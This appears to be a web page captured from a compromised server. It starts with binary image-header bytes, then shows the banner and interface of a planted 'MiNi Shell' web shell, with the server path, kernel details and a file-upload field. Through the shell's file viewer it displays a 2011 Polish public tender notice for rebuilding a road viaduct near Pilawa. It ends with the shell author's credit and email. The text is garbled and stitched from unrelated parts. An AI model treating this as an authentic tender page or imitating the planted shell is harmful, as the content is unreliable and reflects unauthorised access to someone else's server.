JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110525/129314-N-2011.html

<p class="kh_header"><b>Wola Rębkowska: Przebudowa wiaduktu drogowego JNI 1001859 w ciągu drogi powiatowej Nr 1315W Jaźwiny - Augustówka w km 0+454 ÷ 0+483 nad linią kolejową Skierniewice - Łuków w m. Jaźwiny gm. Pilawa</b><br>
<b>Numer ogłoszenia: 129314 - 2011; data zamieszczenia: 25.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Garwolinie , ul. Przemysłowa 45, 08-410 Wola Rębkowska, woj. mazowieckie, tel. 025 6822215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdgarwolin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa wiaduktu drogowego JNI 1001859 w ciągu drogi powiatowej Nr 1315W Jaźwiny - Augustówka w km 0+454 ÷ 0+483 nad linią kolejową Skierniewice - Łuków w m. Jaźwiny gm. Pilawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie przebudowy wiaduktu drogowego JNI 1001859 w ciągu drogi powiatowej Nr 1315W Jaźwiny - Augustówka w km 0+454 ÷ 0+483 nad linią kolejową Skierniewice - Łuków  w m. Jaźwiny gm. Pilawa.
Przewiduje się następujący zakres robót:

ROZBIÓRKA ELEMENTÓW WIADUKTU
Rozbiórka balustrady o słupkach betonowych na wiadukcie i dojazdach w ilości 128 m
Rozbiórka elementów betonowych chodnika w ilości 9,9 m3
Usunięcie nawierzchni gr. 10 z kostki brukowej na wiadukcie w ilości  22,6 m3
Usunięcie podbudowy z kruszywa pod umocnienie skarp masą bitumiczną pod wiaduktem w ilości 59,4 m3
Wywiezienie gruzu betonowego i kostki brukowej na odległość 20 km w ilości 93,7 m3
Rozbiórka osłon przeciwporażeniowych na wiadukcie w ilości 24 m
Wywiezienie osłon przeciwporażeniowych na odległość 20 km w ilości 24 m
Rozbiórka podbudowy gr. 16 cm z podsypki piaskowej na wiadukcie w ilości 36,2 m3
Wywiezienie podbudowy na odległość 20 km w ilości 36,2 m3
Usunięcie izolacji płyty pomostu z wiaduktu na odległość 20 km w ilości 2,3 m3
Wywiezienie izolacji na odległość 20 km w ilości 2,3 m3
Rozbiórka nawierzchni bitumicznej gr. 10 cm w ilości 27,3 m3
Wywiezienie destruktu asfaltowego na odległość 20 km w ilości 27,3 m3
FUNDAMENTOWANIE
Wykonanie wykopów w gruncie nieskalistym, kategorii III w ilości 75,9 m3
Wywiezienie gruntu z wykopów na odległość 20 km w ilości 75,9 m3
Wykonanie podbudowy pod nawierzchnię za przyczółkami z kruszywa łamanego, stabilizowanego mechanicznie  w ilości 26,7 m3
Zakup kruszywa łamanego w ilości 26,7 m3
ZBROJENIE
Zbrojenie betonu stalą klasy A-IIIN, (B500SP) w ilości 9124 kg
BETON
BETON KONSTRUKCYJNY
Beton C20/25 w ilości 17,1 m3
Beton C25/30 w ilości 64,6 m3
BETON NIEKONSTRUKCYJNY
Beton C12/15 w ilości 10,4 m3
IZOLACJE I NAWIERZCHNIE
Dwukrotne smarowanie lepikiem na gorąco w ilości 27,3 m2

Izolacja z papy termozgrzewalnej w ilości 323,6 m2
NAWIERZCHNIA NA MOŚCIE 
W-wa wiążąca z asfaltu twardolanego gr. 4 cm na wiadukcie (pomiędzy dylatacjami) w ilości 216,3 m2
W-wa ścieralna z mieszanki SMA gr. 4 cm na wiadukcie (pomiędzy dylatacjami) w ilości 216,3 m2
Wykonanie nawierzchni żywicznej gr. 4 mm na betonowych kapach chodnikowych i na długości skrzydełek w ilości 92,2 m2
Uszczelnienie z bitumicznej topliwej taśmy uszczelniającej na długości wiaduktu i na dojazdach w ilości  69,5 m
ODWODNIENIE
Montaż wpustów mostowych żeliwnych w ilości 4 szt.
Rury z polipropylenu średnicy 160 mm odprowadzające wody opadowe z wiaduktu w ilości 58 m
Drenaż z pasków geowłókniny złożonych podwójnie, osłoniętych grysem bazaltowym 4/6mm otoczonych kompozycja epoksydową w ilości 141,2 m
Sączki do odprowadzenia wody spod nawierzchni, w rozstawie co 3 m w ilości 20 szt.
URZĄDZENIA DYLATACYJNE
Bitumiczne przekrycia dylatacyjne (dylatacja szczepna) szerokości 50 cm nad dwoma dylatacjami przyczółkowymi w ilości 19,8 m
ELEMENTY ZABEZPIECZAJĄCE
Zakup i ułożenie krawężników kamiennych 20x15 cm na zaprawie żywicznej wodoprzepuszczalnej, na długości przęsła w ilości 69,5 m
Bariero-poręcze mostowe typu sztywnego bezprzekładkowe, słupki w rozstawie co 1 m, pochwyt na wysokości 130 cm w ilości 66 m
Bariery ochronne SP-09/2 jako przedłużenie bariero- poręczy na wiadukcie, o słupkach w rozstawie co 2 m, (w tym odcinki zanikające po 8 m każdy) w ilości 96 m
Zakup i montaż osłon przeciwporażeniowych wg OSŁ5.0, OSŁ5.1, OSŁ5.2 Katalogu Detali Mostowych, osłony ocynkowane i pomalowane dwoma warstwami farb epoksydowo-poliuretanowych w ilości 22 m
ROBOTY RÓŻNE
Przygotowanie starej powierzchni betonu do połączenia z nowym betonem, do napraw powierzchniowych i zabezpieczenia powierzchniowego (lokalne skuwanie uszkodzonego betonu na starych powierzchniach, czyszczenie strumieniowo- ścierne) w ilości 1130,8 m2
Nawiercenie otworów i osadzenie kotew (kotwy wykonane z prętów zbrojeniowych) na zaprawie żywicznej w ilości 2244 szt.
Naprawy powierzchniowe betonu zaprawą PCC (uzupełnienie ubytków betonu, wypełnienie rakowin, reprofilacja w ilości 4,2 m3
Zabezpieczenie powierzchni betonowych poprzez malowanie ochronne szlamem PCC w ilości 913,0 m2
Wykonanie nowych betonowych schodów naskarpowych dla obsługi o szerokości 80 cm, wraz z balustradą ażurową z rur stalowych zabezpieczoną antykorozyjnie w ilości 26 m
Wykonanie spoczników z kostki betonowej na podsypce piaskowo-cementowej, pomiędzy biegami schodów naskarpowych w ilości 6,2 m2
Wykonanie ścieków naskarpowych na podsypce piaskowej gr. 12 cm z prefabrykatów typu korytkowego, zaspoinowanie styków zaprawą cementową w ilości 38 m
Wykonanie umocnienia skarp pod przęsłami skrajnymi, (ułożenie nowych płyt betonowych - dybli typu DC-15) na podsypce piask. gr. 5 cm w ilości 200 m2
Reprofilacja skarp pod wykonanie umocnienia z płyt betonowych - dybli DC-15 w ilości 200 m2
Projekt i montaż urządzeń zabezpieczających przed pojawieniem się napięcia elektrycznego na konstrukcji obiektu, (uszynowienie) 1 kpl
Tymczasowa organizacja ruchu na czas remontu (ruch połową jezdni z sygnalizacją świetlną ) - 1 kpl
Oznakowania poziome na jezdni (linia podwójna ciągła) na długości wiaduktu w ilości 31,8 m

KORZYSTANIE Z TERENU PKP S.A. NA CELE BUDOWY
Korzystanie z gruntów PKP na czas robót pod wiaduktem w ilości 92250 m2*dzień
Organizacja robót pod przęsłem nad torami PKP (zamknięcie ruchu pociągów przez 5 dni (po 8 godzin) na każdym torze) w ilości 10 dni
Uzgodnienie dokumentacji projektowej 1 kpl
Nadzór kolejowy 1 kpl
Przekazanie i odbiór terenu 1 kpl
Opłata z tytułu pozostawienia urządzenia obcego dla  PKP S.A. w ilości 1025 m2

ROBOTY PRZYGOTOWAWCZE
Odtworzenie trasy i punktów wysokościowych w ilości 0,11 km
Rozbiórki elementów dróg, ogrodzeń w ilości 533,5 m2
ROBOTY ZIEMNE
Wykonanie wykopów w ilości 89 m3
Wykonanie stopni na skarpach nasypów w ilości 188 m2
Wykonanie nasypów w ilości 59 m3
PODBUDOWY
Koryto wraz z profilowaniem i zagęszczeniem podłoża w ilości 682 m2
Warstwa mrozoodporna gr. 12 cm w ilości 406 m2
Skropienie emulsją asfaltową podbudowy tłuczniowej w ilości 660 m2
Skropienie warstwy wiążącej w ilości 660 m2
Podbudowa z kruszywa naturalnego stabilizowanego mechanicznie gr. 15 cm w ilości 23 m2
Podbudowa z kruszywa łamanego stabilizowanego mechanicznie gr. 25 cm w ilości 406 m2
NAWIERZCHNIE
Nawierzchnie z tłucznia kamiennego na poboczach - warstwa o gr. 10 cm w ilości 253 m2
Nawierzchnie z betonu asfaltowego AC 16 W PMB 25/55-60 o grubości 9 cm (warstwa wiążąca) w ilości 682 m2
Frezowanie nawierzchni asfaltowych na zimno
Frezowanie nawierzchni bitumicznej o gr. 10 cm z wywozem materiału z rozbiórki w ilości 93,5 m2
Nawierzchnie z mieszanek grysowo-matyksowych (SMA 11 35-50) o uziarnieniu 0/11 o grubości 4 cm (warstwa ścieralna) w ilości 682m2
ROBOTY WYKOŃCZENIOWE
Umocnienie powierzchniowe skarp i dna rowów w ilości 1128 m2
Wykonanie trawników na skarpach (hydroobsiew) w ilości 1128 m2
URZĄDZENIA BEZPIECZEŃSTWA RUCHU
Oznakowanie poziome jezdni mat. grubowarstwowymi - linie ciągłe , wykonane sposobem mechanicznym w ilości 19,68 m2
Znaki drogowe pionowe szt.2
ELEMENTY ULIC
Ława z betonu C 8-10 pod krawężniki kamienne w ilości 1,50 m3
Krawężniki kamienne o gr. 20x15 cm w ilości 20 m
Chodniki z kostki brukowej betonowej grubości 8 cm szarej na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem w ilości 23 m2
Obrzeża betonowe o wymiarach 30x8 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową w ilości 24,6 m.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 24 339,47PLN (słownie; dwadzieścia cztery tysiące trzysta trzydzieści dziewięć złotych  47/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich 5-ciu lat tj. 2006/2007/2008/2009/2010r. przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania o charakterze i złożoności porównywalnej z zakresem opisanego w pkt. 1.1 SIWZ, (załącznik Nr 5) wraz z referencjami od poprzednich zamawiających potwierdzające, że roboty budowlane - wykonanie budowy, przebudowy, odnowy, obiektów mostowych (wiadukty drogowe, mosty) zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz narzędzi wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami. przewidzianego do wykonania zamówienia - na załączonym formularzu - załącznik Nr 4 - zgodnie z wyszczególnieniem w punkcie 5.3. Instrukcji dla Wykonawców</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. na załączonym formularzu - załącznik Nr 3, wraz z oświadczeniami, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że Wykonawca dysponuje środkami finansowymi niezbędnymi do wykonania zamówienia na załączniku Nr 2</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia gdy wykonawca sam nie dysponuje takim potencjałem. Wykaz podmiotów, które będą uczestniczyć w wykonaniu zamówienia jako podwykonawcy wraz z podaniem ich nazw, a także zakresu wykonywanych przez nich czynności - załącznik nr 6 SIWZ, kopia dokumentu wadialnego</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdgarwolin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w  Garwolinie  ul. Przemysłowa 45,  08-410  Wola Rębkowska, pokój nr 6..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2011 godzina 09:30, miejsce: Powiatowy Zarząd Dróg w Garwolinie ul. Przemysłowa 45,  08-410  Wola Rębkowska, 
 pokój nr 3  tj. sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com